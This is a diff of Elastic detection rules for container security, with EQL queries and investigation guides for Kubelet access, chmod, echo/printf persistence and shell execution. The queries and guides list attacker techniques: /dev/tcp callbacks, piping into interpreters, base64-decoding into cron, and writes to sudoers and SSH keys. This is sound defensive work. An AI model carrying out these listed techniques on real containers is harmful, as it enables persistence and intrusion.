"end") and + /* + If the flow is executed from a parent script, the event action will be "exec". + If the flow is executed manually, the event action will be "end". + */ + process.name like ( + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox", + "python*", "perl*", "ruby*", "lua*", "php*" + ) and + process.args like ( + "-bash", "-dash", "-sh", "-tcsh", "-csh", "-zsh", "-ksh", "-fish", + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", + "/bin/bash", "/bin/dash", "/bin/sh", "/bin/tcsh", "/bin/csh", + "/bin/zsh", "/bin/ksh", "/bin/fish", + "/usr/bin/bash", "/usr/bin/dash", "/usr/bin/sh", "/usr/bin/tcsh", + "/usr/bin/csh", "/usr/bin/zsh", "/usr/bin/ksh", "/usr/bin/fish", + "-busybox", "busybox", "/bin/busybox", "/usr/bin/busybox", + "*python*", "*perl*", "*ruby*", "*lua*", "*php*", "/dev/fd/*" + ) and + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + )] +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Command and Control" +id = "TA0011" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml new file mode 100644 index 00000000000..1e80e6c6c4e --- /dev/null +++ b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml @@ -0,0 +1,107 @@ +[metadata] +creation_date = "2026/02/02" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/02/09" + +[rule] +author = ["Elastic"] +description = """ +This rule detects potential direct Kubelet access via process arguments. An adversary may need to access the +Kubelet API to gain access to the Kubernetes API server or other resources within the cluster. These requests +are often used to enumerate or execute commands on the Kubernetes API server or other resources within the +cluster, and may indicate an attempt to move laterally within the cluster. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers + +This detection flags an interactive process started inside a Linux container that includes an HTTP request targeting the Kubelet API on port 10250, a common pivot point for gaining execution and visibility across nodes. Attackers use direct Kubelet access to enumerate pods, fetch logs, or run commands that can lead to broader cluster access and lateral movement. A typical pattern is invoking curl or wget from a container shell against `https://:10250/` endpoints to probe or execute actions. + +### Possible investigation steps + +- Identify the originating pod/workload and container image for the interactive session, then determine whether the container was expected to provide diagnostic tooling or shell access and whether it recently changed. +- Extract the full command line and reconstruct the requested Kubelet endpoint path (for example `/pods`, `/exec`, `/run`, `/logs`) to infer intent (enumeration vs remote execution) and capture any embedded tokens or client cert usage. +- Correlate the process start time with Kubernetes audit logs and API server events to see if there were concurrent pod exec/attach, secret reads, or workload modifications suggesting follow-on activity. +- Verify whether the destination node IP/hostname is the local node or a remote node and review network flow logs/egress policies to confirm the container could reach port 10250 and whether other nodes were contacted. +- Check node and Kubelet configuration for exposure and auth bypass risk (anonymous auth, webhook mode, client certs), and inspect Kubelet logs around the timestamp for the corresponding request and response status codes. + +### False positive analysis + +- A cluster operator or SRE opens an interactive shell in a troubleshooting container and manually curls `https://:10250/` (or `/pods`/`/metrics`) to validate Kubelet reachability, authentication behavior, or node health during incident triage. +- A legitimate in-container diagnostic workflow uses an interactive session to probe the local node’s Kubelet port 10250 for environment verification (e.g., confirming node IP mapping or TLS/cert configuration), embedding the URL in process arguments without any intent to enumerate or execute actions across the cluster. + +### Response and remediation + +- Isolate the affected pod by removing service exposure and applying a temporary egress deny rule to block traffic to node port 10250 from that namespace/pod label, then terminate the interactive shell session and restart the workload from a known-good image. +- Capture and preserve the full command line, container filesystem changes, and relevant Kubelet and Kubernetes audit log entries around the timestamp, then hunt for additional in-cluster attempts to reach `https://:10250/` from other pods or namespaces. +- Rotate any credentials that may have been exposed or used (service account tokens, client certificates, kubeconfig files) and revoke or redeploy affected service accounts, then validate no unauthorized `exec/attach`, secret reads, or workload changes occurred after the access attempt. +- Escalate to the platform security/on-call incident commander immediately if the Kubelet request targeted sensitive endpoints like `/exec`, `/run`, `/containerLogs`, or returned successful responses (2xx/3xx) or if similar commands are seen across multiple nodes. +- Harden by enforcing Kubelet authentication/authorization (disable anonymous access, require webhook authz, restrict client cert issuance), and implement network controls that prevent pods from reaching node Kubelet ports except from approved node-local agents. +- Reduce recurrence by removing shell and HTTP tooling from application images, limiting interactive access (disable `kubectl exec` for non-admins), and tightening RBAC and admission policies to block privileged pods/host networking that increase node API reachability. +""" +references = [ + "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api", + "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster", + "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/" +] +risk_score = 47 +rule_id = "b4bd186b-69c6-45ad-8bef-5c35bbadeaef" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.args like "http*:10250*" and process.interactive == true and container.id like "?*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml new file mode 100644 index 00000000000..37ebcaa3c19 --- /dev/null +++ b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml @@ -0,0 +1,124 @@ +[metadata] +creation_date = "2023/04/26" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects when chmod is used to add the execute permission to a file inside a container. Modifying file +permissions to make a file executable could indicate malicious activity, as an attacker may attempt to run unauthorized +or malicious code inside the container. +""" +from = "now-6m" +index = ["logs-cloud_defend.file*", "logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "File Execution Permission Modification Detected via Defend for Containers" +note = """## Setup + +## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating File Execution Permission Modification Detected via Defend for Containers + +Containers provide isolated environments for running applications, often on Linux systems. The `chmod` command is used to change file permissions, including making files executable. Adversaries may exploit this by altering permissions to execute unauthorized scripts or binaries, potentially leading to malicious activity. The detection rule identifies such actions by monitoring for `chmod` usage that grants execute permissions, focusing on specific permission patterns, and excluding benign cases. This helps in identifying potential threats where attackers attempt to execute unauthorized code within containers. + +### Possible investigation steps + +- Review the container ID associated with the alert to identify the specific container where the `chmod` command was executed. +- Examine the process arguments to determine the exact permissions that were set and identify the file that was made executable. +- Investigate the origin of the `chmod` command by reviewing the process tree to understand which parent process initiated it and whether it aligns with expected behavior. +- Check the user account or service account that executed the `chmod` command to assess if it has legitimate access and reason to modify file permissions. +- Analyze the file that was made executable to determine its contents and origin, checking for any signs of unauthorized or malicious code. +- Correlate this event with other logs or alerts from the same container to identify any patterns or additional suspicious activities that might indicate a broader attack. + +### False positive analysis + +- Routine maintenance scripts or automated processes may use chmod to set execute permissions on files within containers. To handle these, identify and whitelist specific scripts or processes that are known to be safe and necessary for operations. +- Development environments often involve frequent changes to file permissions as developers test and deploy code. Consider excluding specific container IDs or paths associated with development environments to reduce noise. +- Some container orchestration tools might use chmod as part of their normal operation. Review the processes and arguments associated with these tools and create exceptions for known benign activities. +- System updates or package installations within containers might trigger this rule. Monitor and document regular update schedules and processes, and exclude these from triggering alerts if they are verified as non-threatening. +- If certain users or roles are responsible for legitimate permission changes, consider excluding their activities by user ID or role, ensuring that these exclusions are well-documented and reviewed regularly. + +### Response and remediation + +- Immediately isolate the affected container to prevent further execution of unauthorized code. This can be done by stopping the container or disconnecting it from the network. +- Conduct a thorough review of the container's file system to identify any unauthorized or suspicious files that have been made executable. Remove or quarantine these files as necessary. +- Analyze the container's logs to trace the source of the `chmod` command and determine if there are any other indicators of compromise or related malicious activities. +- If the unauthorized execution is confirmed, assess the potential impact on the host system and other containers. Implement additional security measures, such as enhanced monitoring or network segmentation, to protect other assets. +- Escalate the incident to the security operations team for further investigation and to determine if the threat is part of a larger attack campaign. +- Review and update container security policies to prevent unauthorized permission changes, such as implementing stricter access controls and using security tools that enforce policy compliance. +- Enhance detection capabilities by configuring alerts for similar suspicious activities, ensuring that any future attempts to modify file permissions within containers are promptly identified and addressed.""" +references = [ + "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", +] +risk_score = 21 +rule_id = "ec604672-bed9-43e1-8871-cf591c052550" +severity = "low" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +any where event.category in ("file", "process") and event.type in ("change", "creation", "start") and ( + process.name == "chmod" or + ( + /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man" + ) + ) +) and process.args in ("4755", "755", "777", "0777", "444", "+x", "a+x") and +container.id like "?*" and not process.args == "-x" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml index 64fe42e9846..674f355202d 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/03/05" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ references = [ risk_score = 47 rule_id = "cd24c340-b778-44bd-ab69-2f739bd70ce1" severity = "medium" -tags = ["Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -109,22 +117,45 @@ process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.011" -name = "Lua" -reference = "https://attack.mitre.org/techniques/T1059/011/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" + + [[rule.threat.technique.subtechnique]] + name = "Python" + id = "T1059.006" + reference = "https://attack.mitre.org/techniques/T1059/006/" + + [[rule.threat.technique.subtechnique]] + name = "Lua" + id = "T1059.011" + reference = "https://attack.mitre.org/techniques/T1059/011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" + + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" diff --git a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml index 118bdfd306b..f2710c97edc 100644 --- a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml +++ b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] author = ["Elastic"] @@ -58,7 +58,16 @@ references = [ risk_score = 21 rule_id = "f246e70e-5e20-4006-8460-d72b023d6adf" severity = "low" -tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -106,35 +115,25 @@ not process.name in ("apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.002" -name = "At" -reference = "https://attack.mitre.org/techniques/T1053/002/" - [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" -[[rule.threat.technique.subtechnique]] -id = "T1053.006" -name = "Systemd Timers" -reference = "https://attack.mitre.org/techniques/T1053/006/" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] id = "T1546" @@ -154,6 +153,21 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -168,3 +182,21 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml index 1458b7ed0b3..a177a35115c 100644 --- a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml +++ b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -60,7 +60,15 @@ In containerized environments, SSH keys facilitate secure access, but adversarie risk_score = 47 rule_id = "f7769104-e8f9-4931-94a2-68fc04eadec3" severity = "medium" -tags = ["Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -86,3 +94,31 @@ reference = "https://attack.mitre.org/techniques/T1098/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml new file mode 100644 index 00000000000..4e79c7957c8 --- /dev/null +++ b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml @@ -0,0 +1,162 @@ +[metadata] +creation_date = "2026/02/10" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the execution of the echo/printf command to write data to potential persistence files, decode base64/32/16 and +hex content or establish connections to a potential C2. The echo/printf commands are used to display a line of text or write data +to a file. Threat actors may abuse the echo/printf commands to write data to files or file descriptors that are executed (by +other processes or services) to establish persistence or escalate privileges. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Suspicious Echo or Printf Execution Detected via Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Suspicious Echo or Printf Execution Detected via Defend for Containers + +This rule flags interactive shell commands that invoke echo or printf with patterns used to write or stage data into sensitive paths, decode encoded payloads, or reach out via /dev/tcp. Attackers use these lightweight built-ins to avoid dropping tools while creating persistence or privilege escalation by modifying cron, rc.local, sudoers, ld.so preload, or SSH authorized_keys. In a container, a common pattern is execing into a pod and running `sh -c 'printf | base64 -d > /etc/cron.d/job; chmod +x …'` to implant a scheduled backdoor. + +### Possible investigation steps + +- Review the full command line, parent/child process tree, and session metadata to determine who initiated the interactive exec and whether it was an expected administrative action. +- Extract any encoded strings or redirected output from the command and safely decode/pretty-print it to identify dropped scripts, keys, cron entries, or additional staging commands. +- Inspect the referenced destination paths (and their symlink targets) for recent modifications, unexpected permissions/ownership changes, and persistence artifacts such as cron jobs, rc.local edits, ld.so preload configs, sudoers changes, or SSH authorized_keys additions. +- Determine whether the write target resides on a mounted volume shared with the host or other pods, and assess blast radius by checking for the same artifact across replicas/namespaces and CI/CD deployment history. +- Correlate around the execution time for follow-on activity such as outbound connections (including /dev/tcp usage), subsequent interpreter launches, or cleanup actions, and contain by isolating/pausing the workload if malicious behavior is confirmed. + +### False positive analysis + +- An administrator interactively execs into a container during troubleshooting and uses `echo`/`printf` with redirection (and possibly `chmod`) to make a temporary or emergency change in paths like `/etc/profile`, `/etc/update-motd.d`, `/etc/ssh*`, or `~/.ssh/*` to restore access or correct misconfiguration. +- A developer interactively execs into a container to create and run a short diagnostic artifact by using `echo`/`printf` to write into `/tmp` or `/dev/shm`, decode embedded `base64`/hex content, or validate network reachability via `/dev/tcp`, which can resemble staging/persistence behavior. + +### Response and remediation + +- Isolate the affected pod/container by removing it from service (scale to zero or cordon/deny ingress-egress) and, if needed, pause it to preserve the filesystem state before it can overwrite or delete staged artifacts. +- Capture and preserve evidence by exporting the full shell command string and taking a filesystem snapshot/copy of any touched paths such as `/etc/cron*`, `/etc/rc.local`, `/etc/init.d`, `/etc/ld.so*`, `/etc/sudoers*`, and `~/.ssh/authorized_keys`, plus any files created in `/tmp`, `/var/tmp`, or `/dev/shm`. +- Eradicate persistence by removing unauthorized cron entries, rc.local/init scripts, sudoers/ld.so preload modifications, and injected SSH keys, then rotate any exposed credentials and redeploy the workload from a known-good image rather than “cleaning” the live container. +- Recover safely by rebuilding the image with patched dependencies, rolling out a fresh deployment, and validating that no replicas or shared volumes contain the same dropped scripts/keys or modified configuration files. +- Escalate immediately to incident response if the command decodes payloads (base64/base32/hex), writes into system startup/auth paths, invokes an interpreter via a pipe (e.g., `| sh/python/perl/php`), or uses `/dev/tcp` for outbound connectivity, as these indicate active staging or C2 behavior. +- Harden against recurrence by restricting interactive exec access, enforcing read-only root filesystems and least-privilege mounts, blocking writes to sensitive paths via policy, and adding egress controls to prevent `/dev/tcp`-style callbacks.""" +references = [ + "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", +] +risk_score = 73 +rule_id = "d9bfa475-270d-4b07-93cb-b1f49abe13da" +severity = "high" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where event.type == "start" and event.action == "exec" and process.interactive == true and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and +process.args in ("-lc", "-c", "-cl") and process.args like ("*echo *", "*printf *") and +process.args like ( + "*/etc/cron*", "*/etc/rc.local*", "*/dev/tcp/*", "*/etc/init.d*", "*/etc/update-motd.d*", + "*/etc/ld.so*", "*/etc/sudoers*", "*base64 *", "*base32 *", "*base16 *", "*/etc/profile*", + "*/dev/shm/*", "*/etc/ssh*", "*/home/*/.ssh/*", "*/root/.ssh*" , "*~/.ssh/*", "*xxd *", + "*/etc/shadow*", "* /tmp/*", "* /var/tmp/*", "* /dev/shm/* ", "* ~/*", "* /home/*", + "* /run/*", "* /var/run/*", "*|*sh", "*|*python*", "*|*php*", "*|*perl*", "*|*busybox*", + "*/var/www/*", "*>*", "*;*", "*chmod *", "*rm *", "*openssl enc*" +) and container.id like "?*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml new file mode 100644 index 00000000000..eb31c917b85 --- /dev/null +++ b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml @@ -0,0 +1,284 @@ +[metadata] +creation_date = "2026/02/06" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the exploitation of a web server through the execution of a suspicious process by common web server +user accounts. Attackers may upload a web shell to a web server to maintain access to the system. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Web Server Exploitation Detected via Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Web Server Exploitation Detected via Defend for Containers + +This rule flags Linux container activity where a web server (or typical web-service account) executes a suspicious process, a strong indicator of web app exploitation rather than normal request handling. It matters because this pattern commonly marks initial foothold and post-exploitation execution that can lead to persistence and lateral 